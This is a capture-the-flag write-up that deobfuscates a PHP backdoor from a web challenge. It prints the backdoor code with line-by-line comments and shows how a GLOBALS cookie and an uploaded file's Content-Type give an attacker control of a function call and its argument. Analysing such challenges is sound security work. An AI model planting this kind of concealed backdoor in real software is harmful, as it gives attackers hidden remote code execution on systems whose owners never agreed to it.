J0nas is a simple man. He specializes in only one thing: Building the most beautiful back doors that you’ve ever seen. This gem was used in multiple saloons, letting only the most skilled c0wb0ys pass. https://wildwildweb.fluxfingers.net:1425/index.php index.phps
Writeup
In this challenge source-code were delivered immediately in the description and showed a tricky backdoor code.
At a first look it seemed very complex but expanding and commenting helped, a lot!
After some time spent in analysis I obtained this code:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
@$GLOBALS= $GLOBALS{next}= next( $GLOBALS{'GLOBALS'} ) //This moves global array's pointer from _GET to _POST [ $GLOBALS['next']['next'] = //This create a variable $next with content: array( 'next' ) = $_COOKIE['GLOBALS'] See following lines for details next( $GLOBALS ) //This moves global array's pointer from _POST to _COOKIE ['GLOBALS'] //This gets $_COOKIE['GLOBALS'] ][ $next['GLOBALS']= //This create a new element in $next with index GLOBALS and value $_FILES[$_COOKIE['GLOBALS']] See following lines for details next( $GLOBALS[GLOBALS]['GLOBALS'] ) //This moves global array's pointer from _COOKIE to _FILES [ $next['next'] ] //This gets $_FILES[$_COOKIE['GLOBALS']] ][ $next['GLOBALS']=next($next['GLOBALS']) //This moves the array pointer on $next['GLOBALS'], that is $_FILES[$_COOKIE['GLOBALS']], from 'name' key to 'type' key ][ $GLOBALS[next]['next'] //This use $next['next'] (that is $_COOKIE['GLOBALS']) as function ( $GLOBALS['next']{'GLOBALS'} //This use $next['GLOBALS'], that is $_FILES[$_COOKIE['GLOBALS']]['type'] as argument ) ]=next(neXt(${'next'}['next'])); //This isn't useful
After this analysis became clear that a cookie named GLOBALS would define the name of a function to call and the Content-type of an uploaded file using the same function’s name as name would define the argument for that function.